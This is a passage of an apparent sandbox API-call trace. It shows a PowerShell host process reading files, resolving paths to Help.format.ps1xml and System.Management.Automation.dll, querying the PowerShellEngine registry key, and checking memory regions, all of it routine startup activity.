	[0430.499] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.499] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.499] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.500] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.500] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.500] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.500] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.500] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.500] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.501] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.501] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.501] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.501] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.501] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.501] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.502] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.502] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.502] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.503] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.503] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.503] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.503] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.503] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.503] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.503] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.504] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.504] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0xf37, lpOverlapped=0x0) returned 1
	[0430.504] ReadFile (in: hFile=0x1c8, lpBuffer=0x37675ef, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x37675ef*, lpNumberOfBytesRead=0x26cff8*=0x0, lpOverlapped=0x0) returned 1
	[0430.504] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x0, lpOverlapped=0x0) returned 1
	[0430.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0430.504] SetErrorMode (uMode=0x1) returned 0x1
	[0430.504] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26cfa0 | out: lpFileInformation=0x26cfa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0430.504] SetErrorMode (uMode=0x1) returned 0x1
	[0430.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0430.505] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d088 | out: phkResult=0x26d088*=0x1c8) returned 0x0
	[0430.505] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d00c, lpData=0x0, lpcbData=0x26d008*=0x0 | out: lpType=0x26d00c*=0x1, lpData=0x0, lpcbData=0x26d008*=0x56) returned 0x0
	[0430.505] CoTaskMemAlloc (cb=0x5a) returned 0x1b9a2ef0
	[0430.505] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26cfdc, lpData=0x1b9a2ef0, lpcbData=0x26cfd8*=0x56 | out: lpType=0x26cfdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26cfd8*=0x56) returned 0x0
	[0430.505] CoTaskMemFree (pv=0x1b9a2ef0) 
	[0430.505] RegCloseKey (hKey=0x1c8) returned 0x0
	[0430.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0430.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0430.511] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x1f677156, Data2=0x84f4, Data3=0x422f, Data4=([0]=0xab, [1]=0xad, [2]=0x7f, [3]=0x4, [4]=0x62, [5]=0x9a, [6]=0x89, [7]=0xdc))) returned 0x0
	[0430.511] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x21ecb29c, Data2=0x4e9, Data3=0x4f68, Data4=([0]=0x95, [1]=0x2, [2]=0xa5, [3]=0x4a, [4]=0x5e, [5]=0xc, [6]=0x6d, [7]=0xc7))) returned 0x0
	[0430.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.519] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x6803fde1, Data2=0x426c, Data3=0x42fe, Data4=([0]=0xb1, [1]=0x43, [2]=0x23, [3]=0x3a, [4]=0xe6, [5]=0xf1, [6]=0x54, [7]=0xa4))) returned 0x0
	[0430.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.522] VirtualQuery (in: lpAddress=0x26b2c0, lpBuffer=0x26c180, dwLength=0x30 | out: lpBuffer=0x26c180*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.522] VirtualQuery (in: lpAddress=0x26b350, lpBuffer=0x26c210, dwLength=0x30 | out: lpBuffer=0x26c210*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.523] VirtualQuery (in: lpAddress=0x26bad0, lpBuffer=0x26c990, dwLength=0x30 | out: lpBuffer=0x26c990*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.524] VirtualQuery (in: lpAddress=0x26bad0, lpBuffer=0x26c990, dwLength=0x30 | out: lpBuffer=0x26c990*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
